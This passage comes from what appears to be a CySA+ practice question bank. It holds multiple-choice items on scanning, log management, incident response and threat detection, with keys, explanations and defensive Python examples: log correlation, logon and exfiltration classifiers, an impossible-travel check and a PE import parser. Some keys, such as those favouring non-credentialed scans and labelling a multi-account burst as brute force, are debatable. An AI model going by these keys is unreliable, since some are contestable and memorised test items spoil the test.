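    rows += [(ts(e["ts"]), "runtime", f'{e["kind"]} {e["detail"]}')
             for e in runtime if e["pod"] == pod]
    rows += [(ts(e["ts"]), "k8s-audit", f'{e["verb"]} pods/{e["subresource"]} by {e["user"]}')
             for e in audit if e["pod"] == pod]
    rows += [(ts(e["ts"]), "netflow", f'{e["dst_ip"]}:{e["dst_port"]} {e["bytes"]}B')
             for e in flows if e["src_pod"] == pod]
    return sorted(rows)


def root_cause_findings(pod, runtime, audit, flows, known_dst):
    """Answer the question each source is best placed to answer."""
    shell = [e for e in runtime if e["pod"] == pod and e["kind"] == "exec" and e["detail"] in SHELLS]
    host_mount = [e for e in runtime if e["pod"] == pod and e["kind"] == "mount"
                  and e["detail"].startswith("/ ->")]
    api_exec = [e for e in audit if e["pod"] == pod and e["subresource"] == "exec"]
    unknown_egress = [e for e in flows if e["src_pod"] == pod and e["dst_ip"] not in known_dst]
    # Did an API-server exec request land within 60 s before the runtime saw the shell?
    shell_via_api = None
    if shell and api_exec:
        t_shell = ts(shell[0]["ts"])
        near = [a for a in api_exec if 0 <= (t_shell - ts(a["ts"])).total_seconds() <= 60]
        shell_via_api = near[0]["user"] if near else None
    return {
        "interactive_shell": bool(shell),
        "host_filesystem_mounted": bool(host_mount),
        "shell_via_api_user": shell_via_api,
        "unknown_egress": [(e["dst_ip"], e["dst_port"]) for e in unknown_egress],
    }


if __name__ == "__main__":
    for when, source, what in pod_timeline("billing-api-7d9f", RUNTIME_EVENTS, AUDIT_EVENTS, FLOWS):
        print(f"{when.isoformat()}  {source:10} {what}")
    print(root_cause_findings("billing-api-7d9f", RUNTIME_EVENTS, AUDIT_EVENTS, FLOWS, KNOWN_DESTINATIONS))
```

With only the flow logs you would see an outbound connection to port 4444 and nothing else; with only the audit log you would see an exec by a CI service account and not know a shell followed. The merged view ties the identity to the shell, the shell to the host mount, and the mount to the egress.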

796
MCQeasy

An organization wants to perform vulnerability scanning on internal servers that contain sensitive data. The scanning team is concerned about causing service disruptions. Which type of scan should be recommended to minimize risk?

A.Agent-based scan
B.Non-credentialed scan
C.Credentialed scan with safe checks enabled
D.External scan from the internet
AnswerB

Correct. Non-credentialed scans are less likely to impact services.

Why this answer

Non-credentialed scans are less intrusive and less likely to cause service disruptions because they do not log into the target systems. A practical caveat: a credentialed scan with safe checks enabled reads patch and configuration state through a login instead of sending probe traffic to every service, and many teams find it gentler on fragile services than an unauthenticated probe; the key here rests on the scan not logging into the targets at all.

797
Multi-Selecteasy

Which TWO of the following are best practices for secure log management? (Choose TWO)

Select 2 answers
A.Enable log encryption in transit and at rest
B.Implement log aggregation from multiple sources
C.Disable logging on non-critical systems to save space
D.Store logs on the same server for easy access
E.Use a common log format for all sources
AnswersA, B

Encryption protects log integrity and confidentiality.

Why this answer

Option A is correct because encrypting logs in transit (e.g., using TLS/SSL for syslog over TCP 6514) and at rest (e.g., AES-256 encryption on the storage volume) ensures confidentiality and integrity, preventing unauthorized access or tampering. This aligns with security frameworks like NIST SP 800-92 and PCI DSS requirements for protecting log data.

Exam trap

CompTIA often tests the misconception that 'common log format' is a security best practice, but it is actually an operational convenience; the trap is confusing operational efficiency with security controls.

798
MCQeasy

A security analyst is using OpenVAS to perform a vulnerability scan of an internal network. The scan completes and generates a report listing several vulnerabilities. What is the next step in the vulnerability lifecycle?

A.Prioritization
B.Verification
C.Reporting
D.Remediation
AnswerA

Vulnerabilities must be prioritized before deciding which to remediate.

Why this answer

After discovery (scanning), the next step is prioritization of vulnerabilities based on risk, exploitability, and business impact.

799
Multi-Selectmedium

Which TWO of the following are key phases of the incident response process as defined by NIST?

Select 2 answers
A.Recovery
B.Containment
C.Preparation
D.Eradication
E.Post-Incident Activity
AnswersC, E

One of the four main phases.

Why this answer

The NIST SP 800-61 Rev. 2 incident response lifecycle consists of four key phases: Preparation, Detection & Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. Option C (Preparation) is correct because it is the foundational phase where policies, tools (e.g., SIEM, EDR), and communication plans are established before any incident occurs. Option E (Post-Incident Activity) is correct because it includes lessons learned, evidence retention, and report generation to improve future response efforts.

Exam trap

The CS0-003 exam often tests the distinction between the four key NIST phases and the sub-steps within the third phase, causing candidates to mistakenly select Containment, Eradication, or Recovery as separate key phases instead of recognizing they are combined.

800
MCQmedium

A scan of Windows servers reports few findings, but the scanner used no credentials. The security manager suspects missing patch data. What should be changed?

A.Run authenticated scans using least-privilege scanner credentials
B.Increase only the port range
C.Disable host firewalls permanently
D.Trust the unauthenticated result as complete
AnswerA

Authenticated scanning gives the scanner access to installed software and patch state, improving accuracy.

Why this answer

Unauthenticated scans only enumerate open ports and services visible without credentials, missing the patch status of installed software because they cannot query the Windows registry or WMI for installed updates. Running authenticated scans with least-privilege credentials allows the scanner to log into each target and retrieve detailed patch data via the Windows Update Agent API or registry keys, revealing missing patches that were previously invisible. This directly addresses the security manager's suspicion of missing patch data without introducing unnecessary risk.

Exam trap

The CS0-003 exam often tests the misconception that increasing scan depth (e.g., port range or intensity) compensates for lack of authentication, but the trap here is that patch data is only accessible through authenticated access, not by broader network scanning.

How to eliminate wrong answers

Option B is wrong because increasing only the port range expands the network-layer scan but still cannot access patch-level information without authentication; it only finds more open ports, not missing patches. Option C is wrong because permanently disabling host firewalls exposes the servers to network-based attacks and does not enable the scanner to retrieve patch data—authentication is required, not firewall bypass. Option D is wrong because trusting the unauthenticated result as complete ignores the fundamental limitation that unauthenticated scans cannot assess patch status, leaving the organization vulnerable to known exploits that the scanner missed.

801
MCQhard

A security analyst is reviewing SIEM alerts and sees multiple failed logon events from a single external IP address across several user accounts within two minutes. The source IP is from a known malicious geolocation. What type of attack is most likely occurring?

A.Password spraying attack
B.Distributed denial-of-service (DDoS) attack
C.Brute-force attack
D.Pass-the-hash attack
AnswerC

Multiple failed logon attempts from one IP across accounts indicates a brute-force attack.

Why this answer

The scenario describes multiple failed logon attempts from a single external IP against several user accounts within a short time window. This pattern is characteristic of a brute-force attack, where an attacker systematically tries common or guessed passwords across multiple accounts to gain unauthorized access. The single source IP and rapid sequence of failures distinguish it from a password spraying attack, which spreads attempts across many accounts slowly to avoid lockout thresholds.

Exam trap

The trap here is confusing a brute-force attack with a password spraying attack; CompTIA often tests this by emphasizing the speed and source IP concentration versus the slow, distributed nature of password spraying.

How to eliminate wrong answers

Option A is wrong because a password spraying attack uses a small number of common passwords against many accounts over an extended period to evade account lockout, not rapid attempts from one IP against multiple accounts. Option B is wrong because a DDoS attack aims to overwhelm a service with traffic to cause denial of service, not to authenticate via logon events. Option D is wrong because a pass-the-hash attack reuses captured NTLM password hashes to authenticate without knowing the plaintext password; it typically succeeds on the first attempt and does not generate a burst of failed logon events from a single external IP.
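The distinction the question draws (rapid, concentrated failures from one source versus low-and-slow attempts spread across many accounts), as an added example that is not part of the original question bank: a classifier over failed-logon events grouped by source IP, using a sliding window for burst detection. The events are constructed, the source addresses are documentation ranges, and every threshold is an assumption to tune per environment. Note that the page's key calls the rapid multi-account burst a brute-force attack; many teams would also label one password tried across many accounts as spraying regardless of speed, so the classifier follows the page's criteria of speed and source concentration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon events (timestamp, source IP, target account), the
# shape a SIEM would give for Windows Event ID 4625 or an SSO "authentication
# failed" record. Not real log data.
_BASE = datetime(2024, 5, 1, 9, 0, 0)


def _t(seconds):
    return (_BASE + timedelta(seconds=seconds)).isoformat()


EVENTS = []
# 12 failures from one IP across four accounts in 88 seconds: rapid, one source.
for i in range(12):
    EVENTS.append((_t(8 * i), "203.0.113.45", ["alice", "bob", "carol", "dave"][i % 4]))
# One failure each against six accounts, an hour apart: low and slow.
for i in range(6):
    EVENTS.append((_t(3600 * i), "198.51.100.9", f"svc{i}"))
# A user who mistyped twice.
EVENTS.append((_t(5), "10.0.0.5", "erin"))
EVENTS.append((_t(20), "10.0.0.5", "erin"))


def classify_failed_logons(events,
                           burst_attempts=10, burst_window=timedelta(minutes=5),
                           spray_min_accounts=5, spray_max_per_account=2,
                           spray_min_span=timedelta(hours=1)):
    """Label each source IP. Thresholds are assumptions, not vendor defaults."""
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((datetime.fromisoformat(ts), user))
    verdicts = {}
    for ip, items in by_ip.items():
        items.sort()
        times = [t for t, _ in items]
        per_account = defaultdict(int)
        for _, user in items:
            per_account[user] += 1
        # Largest number of attempts inside any burst_window (sliding window).
        burst, j = 0, 0
        for i, t in enumerate(times):
            while t - times[j] > burst_window:
                j += 1
            burst = max(burst, i - j + 1)
        span = times[-1] - times[0]
        if burst >= burst_attempts:
            verdict = "brute-force"
        elif (len(per_account) >= spray_min_accounts
              and max(per_account.values()) <= spray_max_per_account
              and span >= spray_min_span):
            verdict = "password-spraying"
        else:
            verdict = "review"
        verdicts[ip] = {"verdict": verdict, "attempts": len(items),
                        "accounts": len(per_account), "max_burst": burst,
                        "span_seconds": int(span.total_seconds())}
    return verdicts


if __name__ == "__main__":
    for ip, v in classify_failed_logons(EVENTS).items():
        print(ip, v)
```

The spraying branch deliberately ignores the burst counter: six single attempts spread over five hours never trip it, which is exactly why spraying needs a long lookback and a per-account ceiling rather than a failure-rate threshold.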

802
Multi-Selecthard

An analyst is investigating a potential data exfiltration incident. The analyst observes repeated HTTPS connections to a cloud storage provider from a server that does not normally use that service. Which three additional artifacts would strengthen the case for exfiltration?

Select 3 answers
A.The data transfer volume is significantly higher than normal for that server
B.The connections are occurring during non-business hours
C.The connections are made to a known malicious IP
D.The connections occur during business hours only
E.The server is using a non-standard port for HTTPS (e.g., 8080)
AnswersA, B, E

Unusually high data volume is a strong indicator.

Why this answer

Large outbound data volume relative to the server's own baseline, connections outside business hours, and HTTPS on a non-standard port such as 8080 instead of 443 (often a sign of a tunnel or proxy) are classic exfiltration indicators. Option D describes normal behaviour and is therefore not an indicator.
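A scoring function for the indicators in question 802, as an added example that is not part of the original question bank: it compares a host's egress against its baseline, checks for off-hours activity and non-standard ports, and (going one step beyond the key's three) also consults a threat-intelligence set of known-bad destinations. The connection records, the baseline, the business-hours window and the volume ratio are all constructed assumptions, not real telemetry.

```python
from datetime import datetime

# Constructed connection records (time, destination, port, bytes sent) and a
# per-server egress baseline of the kind an analyst derives from a month of
# flow data. Not real telemetry.
BASELINE = {
    "app-srv-07": {"daily_egress_bytes": 50_000_000, "usual_ports": {443}},
    "app-srv-08": {"daily_egress_bytes": 50_000_000, "usual_ports": {443}},
}
CONNECTIONS = [
    {"host": "app-srv-07", "ts": "2024-05-04T02:14:00", "dst": "storage.example.net", "port": 8080, "bytes": 700_000_000},
    {"host": "app-srv-07", "ts": "2024-05-04T02:31:00", "dst": "storage.example.net", "port": 8080, "bytes": 650_000_000},
    {"host": "app-srv-07", "ts": "2024-05-04T02:48:00", "dst": "storage.example.net", "port": 8080, "bytes": 610_000_000},
    {"host": "app-srv-08", "ts": "2024-05-04T10:15:00", "dst": "updates.example.net", "port": 443, "bytes": 10_000_000},
]
BUSINESS_HOURS = range(8, 18)   # 08:00-17:59 local time; assumption
VOLUME_RATIO = 3.0              # flag when egress exceeds 3x the daily baseline


def exfil_indicators(host, conns, baseline, known_bad=frozenset()):
    """Return the indicators present for one host and a simple additive score."""
    mine = [c for c in conns if c["host"] == host]
    total = sum(c["bytes"] for c in mine)
    b = baseline[host]
    indicators = {
        "high_volume": total > VOLUME_RATIO * b["daily_egress_bytes"],
        "off_hours": any(datetime.fromisoformat(c["ts"]).hour not in BUSINESS_HOURS for c in mine),
        "non_standard_port": any(c["port"] not in b["usual_ports"] for c in mine),
        "known_bad_destination": any(c["dst"] in known_bad for c in mine),
    }
    score = sum(indicators.values())
    return {"total_bytes": total, "indicators": indicators,
            "score": score, "escalate": score >= 2}


if __name__ == "__main__":
    for host in BASELINE:
        print(host, exfil_indicators(host, CONNECTIONS, BASELINE))
```

The escalation threshold of two indicators is itself a tuning decision: a single off-hours transfer is common for backups, but off-hours plus a volume many times the baseline on an unusual port rarely is.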

803
MCQhard

A company policy requires that all security incidents be reported to management within one hour of detection. An analyst discovers a low-severity incident (a single malware download attempt blocked by antivirus) at 4:55 PM on a Friday. The analyst is about to leave for the weekend. What should the analyst do?

A.Document the incident in the ticketing system and report it the next business day.
B.Report the incident immediately according to policy, even if it means staying late.
C.Report the incident via email and ignore it until Monday.
D.Wait until Monday morning to report, as it is low severity.
AnswerB

Complying with policy ensures timely reporting, which is mandatory.

Why this answer

Option B is correct because the company policy explicitly requires reporting all security incidents within one hour of detection, regardless of severity. The analyst must report the incident immediately, even if it means staying late, as policy compliance is mandatory and low-severity incidents still represent a security event that could indicate broader compromise or be part of a larger attack chain. Delaying reporting violates the policy and could lead to disciplinary action or missed escalation windows.

Exam trap

The trap here is that candidates assume low-severity incidents can be deferred or handled casually, but CompTIA tests strict adherence to policy timelines regardless of severity, emphasizing that all incidents must be reported within the specified window.

How to eliminate wrong answers

Option A is wrong because documenting the incident in the ticketing system but delaying the report until the next business day violates the one-hour reporting policy, and low severity does not exempt the analyst from timely notification. Option C is wrong because reporting via email and then ignoring the incident until Monday fails to ensure the incident is properly tracked, escalated, or remediated, and it does not constitute a complete report within the required timeframe. Option D is wrong because waiting until Monday morning to report, even for a low-severity incident, directly contradicts the policy that mandates reporting within one hour of detection, and severity does not override the reporting requirement.

804
MCQhard

Based on the exhibit, which vulnerability should the analyst prioritize for remediation?

A.Squid http proxy 3.5.20
B.OpenSSH 7.4
C.Apache httpd 2.4.6
D.MySQL 5.5.62
AnswerD

MySQL 5.5.62 is the final release of the 5.5 branch, which is end-of-life and receives no further security fixes.

Why this answer

MySQL 5.5 reached end of life in December 2018 and 5.5.62 was its final release, so no security fix will ever be issued for it: any vulnerability disclosed in the 5.5 code base after that date stays unpatched. The analyst should prioritize it because the lack of vendor support means the exposure only grows over time, and a database server typically holds the data whose confidentiality and integrity matter most. Note that a banner version alone does not prove that a particular CVE is present on a supported product; with end-of-life software the argument is different, because nothing newer will be fixed regardless of which CVE is involved.

Exam trap

CompTIA often tests the concept that end-of-life software with no vendor support is a higher priority than older but still-supported versions, even if the latter have known CVEs, because unsupported software will never receive patches for future vulnerabilities.

How to eliminate wrong answers

Option A is wrong because Squid 3.5.20 is the version string shipped by RHEL/CentOS 7, where the distribution backports security fixes without changing the banner version, so a scanner's version match does not by itself prove an unpatched flaw; verify against the package changelog (for example 'rpm -q --changelog squid | grep CVE-') rather than the banner. Option B is wrong for the same reason: OpenSSH 7.4 is the RHEL 7 build with backported fixes and does not represent an immediate EOL risk like MySQL 5.5.62. Option C is wrong because Apache httpd 2.4.6 is likewise the RHEL 7 package with vendor support, and a supported web server does not carry the criticality of an unsupported database server that stores sensitive data.

805
MCQmedium

A server team needs to fix an OpenSSL vulnerability across Linux hosts. What should the technical remediation section include? If the primary audience is the business service owner, which content choice is most appropriate?

A.Only estimated financial loss
B.Only a red/yellow/green chart
C.Affected assets, package versions, patch commands or vendor guidance, validation method, and rollback notes
D.Only the CVE headline
AnswerC

Technical teams need precise, actionable remediation steps and a way to confirm success; the executive summary can be tuned to the business service owner while the technical section preserves factual accuracy.

Why this answer

Option C is correct because a technical remediation section must provide actionable steps for the server team to fix the OpenSSL vulnerability. It includes affected assets (specific Linux hosts), package versions (the fixed openssl and libssl package versions named in the vendor advisory), patch commands (e.g., 'yum update openssl' on RHEL, or 'apt-get install --only-upgrade openssl libssl3' on Debian/Ubuntu, where the library ships as a separate package and upgrading 'openssl' alone does not patch it), vendor guidance (e.g., Red Hat or Ubuntu advisories), a validation method, and rollback notes (e.g., 'yum history undo' or a snapshot restore). Validation needs two checks: the installed package version, and that long-running services have been restarted, because a daemon started before the update keeps the old libssl/libcrypto mapped in memory; 'openssl version -a' only reports the command-line tool. For a business service owner, this content is most appropriate because it translates technical actions into clear, auditable steps that demonstrate risk mitigation and operational planning.

Exam trap

The CS0-003 exam often tests the distinction between a technical remediation section (actionable steps for engineers) and a business impact summary (for executives), so candidates mistakenly pick a single metric or chart instead of the comprehensive, executable plan required for the server team.

How to eliminate wrong answers

Option A is wrong because only estimated financial loss is a business impact metric, not a technical remediation step; it fails to provide the server team with any actionable commands or procedures to fix the OpenSSL vulnerability. Option B is wrong because only a red/yellow/green chart is a status summary or risk heatmap, not a remediation plan; it lacks the specific package versions, patch commands, and validation methods needed to execute the fix. Option D is wrong because only the CVE headline (e.g., CVE-2022-3786) identifies the vulnerability but gives no technical steps to remediate it; the server team needs patch commands and rollback procedures, not just a reference number.
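As an added example (not part of the original question bank), the restart check described above: a Python script that scans /proc/<pid>/maps for processes still mapping a deleted libssl or libcrypto after the package upgrade, which is the condition 'openssl version' cannot see. The /proc layout is Linux's own; the fake /proc tree built by build_fake_proc() and the process names in it are constructed for the demo.

```python
import os
import re
import tempfile

# A mapping whose pathname ends in "(deleted)" means the process still executes a
# library that was replaced on disk, i.e. the pre-patch OpenSSL.
STALE_TLS_LIB = re.compile(r"/lib(ssl|crypto)\.so\S*\s+\(deleted\)$")


def stale_tls_processes(proc_root="/proc"):
    """Return {pid: (comm, [stale library paths])} for processes that still map a
    deleted libssl/libcrypto. Reading another user's maps file requires root."""
    stale = {}
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        pdir = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(pdir, "maps")) as fh:
                # maps fields: address perms offset dev inode pathname; the pathname
                # keeps its " (deleted)" suffix, so split into at most 6 fields
                libs = sorted({line.split(None, 5)[5].strip()
                               for line in fh if STALE_TLS_LIB.search(line)})
            with open(os.path.join(pdir, "comm")) as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # process exited between listdir and open, or not readable
        if libs:
            stale[pid] = (comm, libs)
    return stale


def build_fake_proc():
    """Constructed /proc tree for the demo: pid 4242 still maps the deleted
    pre-patch libraries, pid 4243 was restarted and maps the new files."""
    root = tempfile.mkdtemp()
    entries = {
        "4242": ("nginx", [
            "7f2c3a000000-7f2c3a200000 r-xp 00000000 fd:00 123456 /usr/lib64/libssl.so.1.1 (deleted)",
            "7f2c3a400000-7f2c3a900000 r-xp 00000000 fd:00 123457 /usr/lib64/libcrypto.so.1.1 (deleted)",
            "7f2c3b000000-7f2c3b100000 r-xp 00000000 fd:00 123458 /usr/lib64/libz.so.1 (deleted)",
        ]),
        "4243": ("sshd", [
            "7f1100000000-7f1100200000 r-xp 00000000 fd:00 223456 /usr/lib64/libssl.so.1.1",
            "7f1100400000-7f1100900000 r-xp 00000000 fd:00 223457 /usr/lib64/libcrypto.so.1.1",
        ]),
    }
    for pid, (comm, lines) in entries.items():
        os.makedirs(os.path.join(root, pid))
        with open(os.path.join(root, pid, "maps"), "w") as fh:
            fh.write("\n".join(lines) + "\n")
        with open(os.path.join(root, pid, "comm"), "w") as fh:
            fh.write(comm + "\n")
    return root


if __name__ == "__main__":
    # On a real host run this as root after the package upgrade.
    for pid, (comm, libs) in stale_tls_processes().items():
        print(f"restart needed: pid {pid} ({comm}) still maps {', '.join(libs)}")
```

The regex deliberately ignores other deleted libraries (libz in the demo) so the output is the restart list for this advisory only; drop the library filter to get a general "needs restart" list after a larger patch run.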

806
MCQeasy

A security analyst needs to communicate the business impact of a newly discovered critical vulnerability to the executive team. Which of the following is the BEST approach?

A.Send the raw vulnerability scan report.
B.Explain the vulnerability in layman's terms and estimate potential financial loss.
C.Recommend immediate patching without further context.
D.Provide a detailed CVSS score and exploit code.
AnswerB

This translates technical risk to business risk.

Why this answer

Translating technical risk into business terms (financial, reputational, regulatory) helps executives understand the impact and make informed decisions.

807
MCQmedium

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

A.Only DHCP logs from the London office
B.The organisation's public DNS zone file
C.Only the user's browser cache
D.Sign-in logs, MFA result, device details, and mailbox audit events
AnswerD

Impossible travel plus forwarding rule creation is a strong account-compromise pattern; identity and mailbox audit data confirm whether the activity is malicious.

Why this answer

Option D is correct because the scenario describes a potential account takeover or lateral movement, where an impossible travel event (logins from London and Singapore within 12 minutes) is followed by a suspicious mailbox forwarding rule. The analyst must first verify the sign-in logs for authentication details, MFA results to check if the MFA was bypassed or prompted, device details to identify if a known or managed device was used, and mailbox audit events to confirm the forwarding rule creation and its origin. These combined data sources provide the most direct evidence to determine if the activity is malicious or a false positive.

Exam trap

CompTIA often tests the misconception that network-level logs (like DHCP or DNS) are sufficient for investigating user account anomalies, but the correct approach requires focusing on authentication and audit logs that directly capture user identity and actions.

How to eliminate wrong answers

Option A is wrong because DHCP logs only show IP address assignments and cannot provide authentication context, MFA results, or mailbox audit events needed to investigate the impossible travel and forwarding rule. Option B is wrong because the organization's public DNS zone file contains domain name mappings and is irrelevant to user authentication events or mailbox rule changes; it would not help trace the user's activity. Option C is wrong because the user's browser cache is a client-side artifact that may show browsing history but cannot reveal server-side authentication logs, MFA challenges, or mailbox audit events, and it is not a reliable source for enterprise security investigations.
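Added example, not from the original page: the impossible-travel check and its correlation with the mailbox audit trail, run over constructed sign-in and audit events. The city coordinates, the 1000 km/h threshold, the two-hour rule window and the IP-to-city resolution are assumptions; 'New-InboxRule' is the operation name as recorded in the Exchange Online audit log.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

# Assumptions: sign-in locations already resolved from source IP to a city,
# and a fixed coordinate table for those cities.
GEO = {"London": (51.5074, -0.1278), "Singapore": (1.3521, 103.8198)}
MAX_KMH = 1000                      # above airliner speed: physically impossible travel
RULE_WINDOW = timedelta(hours=2)    # a forwarding rule created this soon after the login counts as related

# Constructed sign-in events: (user, city, UTC time, MFA result, managed device)
SIGNINS = [
    ("alice", "London", "2024-03-06 08:02:00", "success", True),
    ("alice", "Singapore", "2024-03-06 08:14:00", "success", False),
    ("bob", "London", "2024-03-06 09:00:00", "success", True),
    ("bob", "London", "2024-03-06 17:30:00", "success", True),
]
# Constructed mailbox audit events: (user, UTC time, operation as logged)
MAILBOX_AUDIT = [
    ("alice", "2024-03-06 08:20:00", "New-InboxRule"),
    ("bob", "2024-03-06 12:00:00", "Set-Mailbox"),
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def distance_km(a, b):
    """Great-circle distance via the haversine formula (Earth radius 6371 km)."""
    lat1, lon1 = map(radians, a)
    lat2, lon2 = map(radians, b)
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(h))


def impossible_travel(signins):
    """Flag consecutive sign-ins per user whose implied speed exceeds MAX_KMH."""
    by_user = defaultdict(list)
    for user, city, ts, mfa, managed in signins:
        by_user[user].append((_ts(ts), city, mfa, managed))
    findings = []
    for user, events in by_user.items():
        events.sort()
        for (t1, c1, _, _), (t2, c2, mfa, managed) in zip(events, events[1:]):
            km = distance_km(GEO[c1], GEO[c2])
            hours = (t2 - t1).total_seconds() / 3600
            speed = km / hours if hours else (float("inf") if km else 0.0)
            if speed > MAX_KMH:
                findings.append({"user": user, "from": c1, "to": c2, "at": t2,
                                 "speed_kmh": round(speed), "mfa": mfa,
                                 "managed_device": managed})
    return findings


def correlate(findings, audit):
    """Attach any inbox-rule creation that follows the suspicious login; that
    combination is what turns 'possible VPN artefact' into a likely takeover."""
    for f in findings:
        f["forwarding_rule"] = any(
            user == f["user"] and op == "New-InboxRule"
            and timedelta(0) <= _ts(ts) - f["at"] <= RULE_WINDOW
            for user, ts, op in audit)
        f["priority"] = "high" if f["forwarding_rule"] else "medium"
    return findings


if __name__ == "__main__":
    for f in correlate(impossible_travel(SIGNINS), MAILBOX_AUDIT):
        print(f)
```

The speed test alone is noisy (corporate VPN egress and mobile carrier geolocation both produce false impossible travel); the noise reduction the question asks about comes from requiring the second signal, the mailbox change, before raising priority, and from keeping the MFA result and device state in the finding so the analyst's first triage questions are already answered.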

808
MCQeasy

While supporting a hybrid workforce, a company wants to test whether legal, PR, IT, and executives understand their roles during a ransomware incident without touching production systems. What exercise is best? During post-incident improvement, which decision is most defensible, and which evidence should guide it?

A.Tabletop exercise using a realistic ransomware scenario
B.Purchasing a new SIEM without testing procedures
C.Annual password reset only
D.Full destructive malware detonation in production
AnswerA

Tabletops validate decision paths and communication without operational disruption. In post-incident improvement, responders need action that reduces risk while preserving the investigation record.

Why this answer

A tabletop exercise (option A) is the correct choice because it simulates a realistic ransomware scenario in a discussion-based format, allowing legal, PR, IT, and executives to validate their roles and decision-making processes without impacting production systems. This aligns with NIST SP 800-61r2 guidelines for testing incident response plans through low-impact, discussion-driven exercises, ensuring cross-functional coordination without risking data integrity or availability.

Exam trap

The CS0-003 exam often tests the distinction between 'testing the plan' (tabletop) and 'testing the technology' (SIEM purchase or password reset), where candidates mistakenly choose a technical solution like a new SIEM because they focus on detection tools rather than validating human roles and decision-making processes.

How to eliminate wrong answers

Option B is wrong because purchasing a new SIEM without testing procedures introduces untested technology into the environment, which can create false positives/negatives and operational gaps, and does not validate human roles during an incident. Option C is wrong because an annual password reset only addresses a single authentication control and does not test the multi-team response, communication, or decision-making required during a ransomware incident, leaving critical gaps in legal, PR, and executive coordination. Option D is wrong because detonating destructive malware in production risks real data loss and downtime, which directly contradicts the requirement not to touch production systems; live detonation belongs in an isolated lab or cyber range.

809
Drag & Dropmedium

Arrange the steps for a typical penetration testing engagement in the correct order.


Why this order

Penetration testing follows a structured methodology: recon, scanning, exploitation, post-exploitation, and reporting.

810
MCQeasy

A security analyst is analyzing a suspicious file using static analysis. The analyst wants to identify imported functions to determine the file's capabilities. Which tool or technique is BEST suited for this task?

A.Extracting strings from the file
B.Submitting the file to VirusTotal
C.Running the file in a sandbox like Cuckoo
D.Analyzing the PE header's import table
AnswerD

The import table lists all DLLs and functions the file uses, providing insight into its behavior.

Why this answer

PE header analysis includes walking the import directory (data directory entry 1 of the optional header) to see which DLLs, and which named or ordinal functions in them, the loader resolves at start-up; imports such as WriteProcessMemory, CreateRemoteThread or VirtualAllocEx suggest injection, CryptEncrypt suggests encryption, and WinINet or WinHTTP functions suggest network capability. The table only shows static imports: a packed sample, or one that resolves APIs at runtime through LoadLibrary and GetProcAddress, shows an almost empty table, and that near-empty table is itself an indicator that dynamic analysis is needed.
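Added example, not from the original page: a minimal import-table walker for PE files (DOS header, PE signature, optional header, data directory 1, import descriptors, thunks, hint/name entries), with a constructed PE32 buffer from build_sample_pe() so it runs offline; that buffer is not a real or runnable executable. The list of injection-related APIs is an illustrative assumption.

```python
import struct

# Illustrative assumption: imports that together point at code injection.
INJECTION_APIS = {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                  "NtUnmapViewOfSection", "SetThreadContext", "ResumeThread"}


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")


def _rva_to_offset(rva, sections):
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} not in any section")


def list_imports(data):
    """Return {dll: [function names or #ordinal]} from the import directory."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ)")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                 # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = pe + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    is64 = struct.unpack_from("<H", data, opt)[0] == 0x20B     # PE32+ uses 8-byte thunks
    dirs = opt + (112 if is64 else 96)                           # data directories follow the fixed fields
    imp_rva, _ = struct.unpack_from("<II", data, dirs + 8)       # entry 1 = import table
    sections = []
    for i in range(nsec):
        s = opt + opt_size + 40 * i
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, s + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    imports = {}
    if imp_rva == 0:
        return imports
    desc = _rva_to_offset(imp_rva, sections)
    fmt, width, ord_flag = ("<Q", 8, 1 << 63) if is64 else ("<I", 4, 1 << 31)
    while True:
        ilt, _, _, name_rva, iat = struct.unpack_from("<IIIII", data, desc)
        if name_rva == 0:                                        # null descriptor ends the table
            break
        thunk = _rva_to_offset(ilt or iat, sections)             # lookup table, else the IAT
        funcs = []
        while (entry := struct.unpack_from(fmt, data, thunk)[0]):
            if entry & ord_flag:
                funcs.append(f"#{entry & 0xFFFF}")
            else:                                                # +2 skips the 16-bit hint
                funcs.append(_cstr(data, _rva_to_offset(entry, sections) + 2))
            thunk += width
        imports[_cstr(data, _rva_to_offset(name_rva, sections))] = funcs
        desc += 20
    return imports


def injection_indicators(imports):
    return sorted(f for funcs in imports.values() for f in funcs if f in INJECTION_APIS)


def build_sample_pe():
    """Constructed minimal PE32 (one section, one DLL) for the demo; not a runnable binary."""
    sec_va, sec_raw = 0x1000, 0x200
    body = bytearray()

    def place(blob):                          # append to the section, return its RVA
        rva = sec_va + len(body)
        body.extend(blob)
        return rva

    desc_rva = place(b"\0" * 40)              # KERNEL32 descriptor + null terminator, patched below
    name_rva = place(b"KERNEL32.dll\0")
    hints = [place(b"\0\0" + f.encode() + b"\0")
             for f in ("WriteProcessMemory", "CreateRemoteThread", "GetProcAddress")]
    ilt_rva = place(struct.pack("<4I", *hints, 0))
    iat_rva = place(struct.pack("<4I", *hints, 0))
    struct.pack_into("<5I", body, desc_rva - sec_va, ilt_rva, 0, 0, name_rva, iat_rva)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)    # i386, 1 section, PE32 opt header
    opt = bytearray(0xE0)
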